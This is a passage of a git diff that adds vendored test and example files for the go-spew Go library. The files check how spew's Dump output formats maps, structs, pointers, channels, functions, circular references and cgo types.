// Map with custom formatter type on pointer receiver only keys and vals. 
+ k2 := pstringer("one") + v2 := pstringer("1") + m2 := map[pstringer]pstringer{k2: v2} + k2Len := fmt.Sprintf("%d", len(k2)) + v2Len := fmt.Sprintf("%d", len(v2)) + m2Len := fmt.Sprintf("%d", len(m2)) + nilMap2 := map[pstringer]pstringer(nil) + nm2 := (*map[pstringer]pstringer)(nil) + pm2 := &m2 + m2Addr := fmt.Sprintf("%p", pm2) + pm2Addr := fmt.Sprintf("%p", &pm2) + m2t := "map[spew_test.pstringer]spew_test.pstringer" + m2t1 := "spew_test.pstringer" + m2t2 := "spew_test.pstringer" + m2s := "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + ") " + + "stringer one: (" + m2t2 + ") (len=" + v2Len + ") stringer 1\n}" + if spew.UnsafeDisabled { + m2s = "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + + ") " + "\"one\": (" + m2t2 + ") (len=" + v2Len + + ") \"1\"\n}" + } + addDumpTest(m2, "("+m2t+") "+m2s+"\n") + addDumpTest(pm2, "(*"+m2t+")("+m2Addr+")("+m2s+")\n") + addDumpTest(&pm2, "(**"+m2t+")("+pm2Addr+"->"+m2Addr+")("+m2s+")\n") + addDumpTest(nm2, "(*"+m2t+")()\n") + addDumpTest(nilMap2, "("+m2t+") \n") + + // Map with interface keys and values. + k3 := "one" + k3Len := fmt.Sprintf("%d", len(k3)) + m3 := map[interface{}]interface{}{k3: 1} + m3Len := fmt.Sprintf("%d", len(m3)) + nilMap3 := map[interface{}]interface{}(nil) + nm3 := (*map[interface{}]interface{})(nil) + pm3 := &m3 + m3Addr := fmt.Sprintf("%p", pm3) + pm3Addr := fmt.Sprintf("%p", &pm3) + m3t := "map[interface {}]interface {}" + m3t1 := "string" + m3t2 := "int" + m3s := "(len=" + m3Len + ") {\n (" + m3t1 + ") (len=" + k3Len + ") " + + "\"one\": (" + m3t2 + ") 1\n}" + addDumpTest(m3, "("+m3t+") "+m3s+"\n") + addDumpTest(pm3, "(*"+m3t+")("+m3Addr+")("+m3s+")\n") + addDumpTest(&pm3, "(**"+m3t+")("+pm3Addr+"->"+m3Addr+")("+m3s+")\n") + addDumpTest(nm3, "(*"+m3t+")()\n") + addDumpTest(nilMap3, "("+m3t+") \n") + + // Map with nil interface value. 
+ k4 := "nil" + k4Len := fmt.Sprintf("%d", len(k4)) + m4 := map[string]interface{}{k4: nil} + m4Len := fmt.Sprintf("%d", len(m4)) + nilMap4 := map[string]interface{}(nil) + nm4 := (*map[string]interface{})(nil) + pm4 := &m4 + m4Addr := fmt.Sprintf("%p", pm4) + pm4Addr := fmt.Sprintf("%p", &pm4) + m4t := "map[string]interface {}" + m4t1 := "string" + m4t2 := "interface {}" + m4s := "(len=" + m4Len + ") {\n (" + m4t1 + ") (len=" + k4Len + ")" + + " \"nil\": (" + m4t2 + ") \n}" + addDumpTest(m4, "("+m4t+") "+m4s+"\n") + addDumpTest(pm4, "(*"+m4t+")("+m4Addr+")("+m4s+")\n") + addDumpTest(&pm4, "(**"+m4t+")("+pm4Addr+"->"+m4Addr+")("+m4s+")\n") + addDumpTest(nm4, "(*"+m4t+")()\n") + addDumpTest(nilMap4, "("+m4t+") \n") +} + +func addStructDumpTests() { + // Struct with primitives. + type s1 struct { + a int8 + b uint8 + } + v := s1{127, 255} + nv := (*s1)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.s1" + vt2 := "int8" + vt3 := "uint8" + vs := "{\n a: (" + vt2 + ") 127,\n b: (" + vt3 + ") 255\n}" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Struct that contains another struct. 
+ type s2 struct { + s1 s1 + b bool + } + v2 := s2{s1{127, 255}, true} + nv2 := (*s2)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.s2" + v2t2 := "spew_test.s1" + v2t3 := "int8" + v2t4 := "uint8" + v2t5 := "bool" + v2s := "{\n s1: (" + v2t2 + ") {\n a: (" + v2t3 + ") 127,\n b: (" + + v2t4 + ") 255\n },\n b: (" + v2t5 + ") true\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Struct that contains custom type with Stringer pointer interface via both + // exported and unexported fields. + type s3 struct { + s pstringer + S pstringer + } + v3 := s3{"test", "test2"} + nv3 := (*s3)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.s3" + v3t2 := "spew_test.pstringer" + v3s := "{\n s: (" + v3t2 + ") (len=4) stringer test,\n S: (" + v3t2 + + ") (len=5) stringer test2\n}" + v3sp := v3s + if spew.UnsafeDisabled { + v3s = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" + + v3t2 + ") (len=5) \"test2\"\n}" + v3sp = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" + + v3t2 + ") (len=5) stringer test2\n}" + } + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3sp+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3sp+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Struct that contains embedded struct and field to same struct. 
+ e := embed{"embedstr"} + eLen := fmt.Sprintf("%d", len("embedstr")) + v4 := embedwrap{embed: &e, e: &e} + nv4 := (*embedwrap)(nil) + pv4 := &v4 + eAddr := fmt.Sprintf("%p", &e) + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "spew_test.embedwrap" + v4t2 := "spew_test.embed" + v4t3 := "string" + v4s := "{\n embed: (*" + v4t2 + ")(" + eAddr + ")({\n a: (" + v4t3 + + ") (len=" + eLen + ") \"embedstr\"\n }),\n e: (*" + v4t2 + + ")(" + eAddr + ")({\n a: (" + v4t3 + ") (len=" + eLen + ")" + + " \"embedstr\"\n })\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") +} + +func addUintptrDumpTests() { + // Null pointer. + v := uintptr(0) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uintptr" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + + // Address of real variable. + i := 1 + v2 := uintptr(unsafe.Pointer(&i)) + nv2 := (*uintptr)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uintptr" + v2s := fmt.Sprintf("%p", &i) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addUnsafePointerDumpTests() { + // Null pointer. + v := unsafe.Pointer(uintptr(0)) + nv := (*unsafe.Pointer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "unsafe.Pointer" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Address of real variable. 
+ i := 1 + v2 := unsafe.Pointer(&i) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "unsafe.Pointer" + v2s := fmt.Sprintf("%p", &i) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addChanDumpTests() { + // Nil channel. + var v chan int + pv := &v + nv := (*chan int)(nil) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "chan int" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Real channel. + v2 := make(chan int) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "chan int" + v2s := fmt.Sprintf("%p", v2) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addFuncDumpTests() { + // Function with no params and no returns. + v := addIntDumpTests + nv := (*func())(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "func()" + vs := fmt.Sprintf("%p", v) + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Function with param and no returns. 
+ v2 := TestDump + nv2 := (*func(*testing.T))(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "func(*testing.T)" + v2s := fmt.Sprintf("%p", v2) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Function with multiple params and multiple returns. + var v3 = func(i int, s string) (b bool, err error) { + return true, nil + } + nv3 := (*func(int, string) (bool, error))(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "func(int, string) (bool, error)" + v3s := fmt.Sprintf("%p", v3) + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") +} + +func addCircularDumpTests() { + // Struct that is circular through self referencing. + type circular struct { + c *circular + } + v := circular{nil} + v.c = &v + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.circular" + vs := "{\n c: (*" + vt + ")(" + vAddr + ")({\n c: (*" + vt + ")(" + + vAddr + ")()\n })\n}" + vs2 := "{\n c: (*" + vt + ")(" + vAddr + ")()\n}" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs2+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs2+")\n") + + // Structs that are circular through cross referencing. 
+ v2 := xref1{nil} + ts2 := xref2{&v2} + v2.ps2 = &ts2 + pv2 := &v2 + ts2Addr := fmt.Sprintf("%p", &ts2) + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.xref1" + v2t2 := "spew_test.xref2" + v2s := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t + + ")(" + v2Addr + ")({\n ps2: (*" + v2t2 + ")(" + ts2Addr + + ")()\n })\n })\n}" + v2s2 := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t + + ")(" + v2Addr + ")()\n })\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s2+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s2+")\n") + + // Structs that are indirectly circular. + v3 := indirCir1{nil} + tic2 := indirCir2{nil} + tic3 := indirCir3{&v3} + tic2.ps3 = &tic3 + v3.ps2 = &tic2 + pv3 := &v3 + tic2Addr := fmt.Sprintf("%p", &tic2) + tic3Addr := fmt.Sprintf("%p", &tic3) + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.indirCir1" + v3t2 := "spew_test.indirCir2" + v3t3 := "spew_test.indirCir3" + v3s := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 + + ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr + + ")({\n ps2: (*" + v3t2 + ")(" + tic2Addr + + ")()\n })\n })\n })\n}" + v3s2 := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 + + ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr + + ")()\n })\n })\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s2+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s2+")\n") +} + +func addPanicDumpTests() { + // Type that panics in its Stringer interface. 
+ v := panicer(127) + nv := (*panicer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.panicer" + vs := "(PANIC=test panic)127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addErrorDumpTests() { + // Type that has a custom Error interface. + v := customError(127) + nv := (*customError)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.customError" + vs := "error: 127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +// TestDump executes all of the tests described by dumpTests. +func TestDump(t *testing.T) { + // Setup tests. + addIntDumpTests() + addUintDumpTests() + addBoolDumpTests() + addFloatDumpTests() + addComplexDumpTests() + addArrayDumpTests() + addSliceDumpTests() + addStringDumpTests() + addInterfaceDumpTests() + addMapDumpTests() + addStructDumpTests() + addUintptrDumpTests() + addUnsafePointerDumpTests() + addChanDumpTests() + addFuncDumpTests() + addCircularDumpTests() + addPanicDumpTests() + addErrorDumpTests() + addCgoDumpTests() + + t.Logf("Running %d tests", len(dumpTests)) + for i, test := range dumpTests { + buf := new(bytes.Buffer) + spew.Fdump(buf, test.in) + s := buf.String() + if testFailed(s, test.wants) { + t.Errorf("Dump #%d\n got: %s %s", i, s, stringizeWants(test.wants)) + continue + } + } +} + +func TestDumpSortedKeys(t *testing.T) { + cfg := spew.ConfigState{SortKeys: true} + s := cfg.Sdump(map[int]string{1: "1", 3: "3", 2: "2"}) + expected := "(map[int]string) (len=3) {\n(int) 1: (string) (len=1) " + + "\"1\",\n(int) 2: (string) (len=1) \"2\",\n(int) 3: (string) " + + "(len=1) \"3\"\n" + + "}\n" + if s != expected { + 
t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[stringer]int{"1": 1, "3": 3, "2": 2}) + expected = "(map[spew_test.stringer]int) (len=3) {\n" + + "(spew_test.stringer) (len=1) stringer 1: (int) 1,\n" + + "(spew_test.stringer) (len=1) stringer 2: (int) 2,\n" + + "(spew_test.stringer) (len=1) stringer 3: (int) 3\n" + + "}\n" + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2}) + expected = "(map[spew_test.pstringer]int) (len=3) {\n" + + "(spew_test.pstringer) (len=1) stringer 1: (int) 1,\n" + + "(spew_test.pstringer) (len=1) stringer 2: (int) 2,\n" + + "(spew_test.pstringer) (len=1) stringer 3: (int) 3\n" + + "}\n" + if spew.UnsafeDisabled { + expected = "(map[spew_test.pstringer]int) (len=3) {\n" + + "(spew_test.pstringer) (len=1) \"1\": (int) 1,\n" + + "(spew_test.pstringer) (len=1) \"2\": (int) 2,\n" + + "(spew_test.pstringer) (len=1) \"3\": (int) 3\n" + + "}\n" + } + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2}) + expected = "(map[spew_test.customError]int) (len=3) {\n" + + "(spew_test.customError) error: 1: (int) 1,\n" + + "(spew_test.customError) error: 2: (int) 2,\n" + + "(spew_test.customError) error: 3: (int) 3\n" + + "}\n" + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + +} diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go new file mode 100644 index 0000000000..6ab180809a --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go @@ -0,0 +1,99 @@ +// Copyright (c) 2013-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright 
notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when both cgo is supported and "-tags testcgo" is added to the go test +// command line. This means the cgo tests are only added (and hence run) when +// specifially requested. This configuration is used because spew itself +// does not require cgo to run even though it does handle certain cgo types +// specially. Rather than forcing all clients to require cgo and an external +// C compiler just to run the tests, this scheme makes them optional. +// +build cgo,testcgo + +package spew_test + +import ( + "fmt" + + "github.com/davecgh/go-spew/spew/testdata" +) + +func addCgoDumpTests() { + // C char pointer. + v := testdata.GetCgoCharPointer() + nv := testdata.GetCgoNullCharPointer() + pv := &v + vcAddr := fmt.Sprintf("%p", v) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "*testdata._Ctype_char" + vs := "116" + addDumpTest(v, "("+vt+")("+vcAddr+")("+vs+")\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+"->"+vcAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+"->"+vcAddr+")("+vs+")\n") + addDumpTest(nv, "("+vt+")()\n") + + // C char array. 
+ v2, v2l, v2c := testdata.GetCgoCharArray() + v2Len := fmt.Sprintf("%d", v2l) + v2Cap := fmt.Sprintf("%d", v2c) + v2t := "[6]testdata._Ctype_char" + v2s := "(len=" + v2Len + " cap=" + v2Cap + ") " + + "{\n 00000000 74 65 73 74 32 00 " + + " |test2.|\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + + // C unsigned char array. + v3, v3l, v3c := testdata.GetCgoUnsignedCharArray() + v3Len := fmt.Sprintf("%d", v3l) + v3Cap := fmt.Sprintf("%d", v3c) + v3t := "[6]testdata._Ctype_unsignedchar" + v3t2 := "[6]testdata._Ctype_uchar" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") " + + "{\n 00000000 74 65 73 74 33 00 " + + " |test3.|\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n", "("+v3t2+") "+v3s+"\n") + + // C signed char array. + v4, v4l, v4c := testdata.GetCgoSignedCharArray() + v4Len := fmt.Sprintf("%d", v4l) + v4Cap := fmt.Sprintf("%d", v4c) + v4t := "[6]testdata._Ctype_schar" + v4t2 := "testdata._Ctype_schar" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 101,\n (" + v4t2 + + ") 115,\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 52,\n (" + v4t2 + + ") 0\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + + // C uint8_t array. + v5, v5l, v5c := testdata.GetCgoUint8tArray() + v5Len := fmt.Sprintf("%d", v5l) + v5Cap := fmt.Sprintf("%d", v5c) + v5t := "[6]testdata._Ctype_uint8_t" + v5s := "(len=" + v5Len + " cap=" + v5Cap + ") " + + "{\n 00000000 74 65 73 74 35 00 " + + " |test5.|\n}" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + + // C typedefed unsigned char array. 
+ v6, v6l, v6c := testdata.GetCgoTypdefedUnsignedCharArray() + v6Len := fmt.Sprintf("%d", v6l) + v6Cap := fmt.Sprintf("%d", v6c) + v6t := "[6]testdata._Ctype_custom_uchar_t" + v6s := "(len=" + v6Len + " cap=" + v6Cap + ") " + + "{\n 00000000 74 65 73 74 36 00 " + + " |test6.|\n}" + addDumpTest(v6, "("+v6t+") "+v6s+"\n") +} diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go new file mode 100644 index 0000000000..52a0971fb3 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go @@ -0,0 +1,26 @@ +// Copyright (c) 2013 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when either cgo is not supported or "-tags testcgo" is not added to the go +// test command line. This file intentionally does not setup any cgo tests in +// this scenario. +// +build !cgo !testcgo + +package spew_test + +func addCgoDumpTests() { + // Don't add any tests for cgo since this file is only compiled when + // there should not be any cgo tests. 
+} diff --git a/vendor/github.com/davecgh/go-spew/spew/example_test.go b/vendor/github.com/davecgh/go-spew/spew/example_test.go new file mode 100644 index 0000000000..c6ec8c6d59 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/example_test.go @@ -0,0 +1,226 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "fmt" + + "github.com/davecgh/go-spew/spew" +) + +type Flag int + +const ( + flagOne Flag = iota + flagTwo +) + +var flagStrings = map[Flag]string{ + flagOne: "flagOne", + flagTwo: "flagTwo", +} + +func (f Flag) String() string { + if s, ok := flagStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown flag (%d)", int(f)) +} + +type Bar struct { + data uintptr +} + +type Foo struct { + unexportedField Bar + ExportedField map[interface{}]interface{} +} + +// This example demonstrates how to use Dump to dump variables to stdout. 
+func ExampleDump() { + // The following package level declarations are assumed for this example: + /* + type Flag int + + const ( + flagOne Flag = iota + flagTwo + ) + + var flagStrings = map[Flag]string{ + flagOne: "flagOne", + flagTwo: "flagTwo", + } + + func (f Flag) String() string { + if s, ok := flagStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown flag (%d)", int(f)) + } + + type Bar struct { + data uintptr + } + + type Foo struct { + unexportedField Bar + ExportedField map[interface{}]interface{} + } + */ + + // Setup some sample data structures for the example. + bar := Bar{uintptr(0)} + s1 := Foo{bar, map[interface{}]interface{}{"one": true}} + f := Flag(5) + b := []byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + + // Dump! + spew.Dump(s1, f, b) + + // Output: + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // (spew_test.Flag) Unknown flag (5) + // ([]uint8) (len=34 cap=34) { + // 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... | + // 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + // 00000020 31 32 |12| + // } + // +} + +// This example demonstrates how to use Printf to display a variable with a +// format string and inline formatting. +func ExamplePrintf() { + // Create a double pointer to a uint 8. + ui8 := uint8(5) + pui8 := &ui8 + ppui8 := &pui8 + + // Create a circular data type. + type circular struct { + ui8 uint8 + c *circular + } + c := circular{ui8: 1} + c.c = &c + + // Print! 
+ spew.Printf("ppui8: %v\n", ppui8) + spew.Printf("circular: %v\n", c) + + // Output: + // ppui8: <**>5 + // circular: {1 <*>{1 <*>}} +} + +// This example demonstrates how to use a ConfigState. +func ExampleConfigState() { + // Modify the indent level of the ConfigState only. The global + // configuration is not modified. + scs := spew.ConfigState{Indent: "\t"} + + // Output using the ConfigState instance. + v := map[string]int{"one": 1} + scs.Printf("v: %v\n", v) + scs.Dump(v) + + // Output: + // v: map[one:1] + // (map[string]int) (len=1) { + // (string) (len=3) "one": (int) 1 + // } +} + +// This example demonstrates how to use ConfigState.Dump to dump variables to +// stdout +func ExampleConfigState_Dump() { + // See the top-level Dump example for details on the types used in this + // example. + + // Create two ConfigState instances with different indentation. + scs := spew.ConfigState{Indent: "\t"} + scs2 := spew.ConfigState{Indent: " "} + + // Setup some sample data structures for the example. + bar := Bar{uintptr(0)} + s1 := Foo{bar, map[interface{}]interface{}{"one": true}} + + // Dump using the ConfigState instances. + scs.Dump(s1) + scs2.Dump(s1) + + // Output: + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // +} + +// This example demonstrates how to use ConfigState.Printf to display a variable +// with a format string and inline formatting. +func ExampleConfigState_Printf() { + // See the top-level Dump example for details on the types used in this + // example. + + // Create two ConfigState instances and modify the method handling of the + // first ConfigState only. 
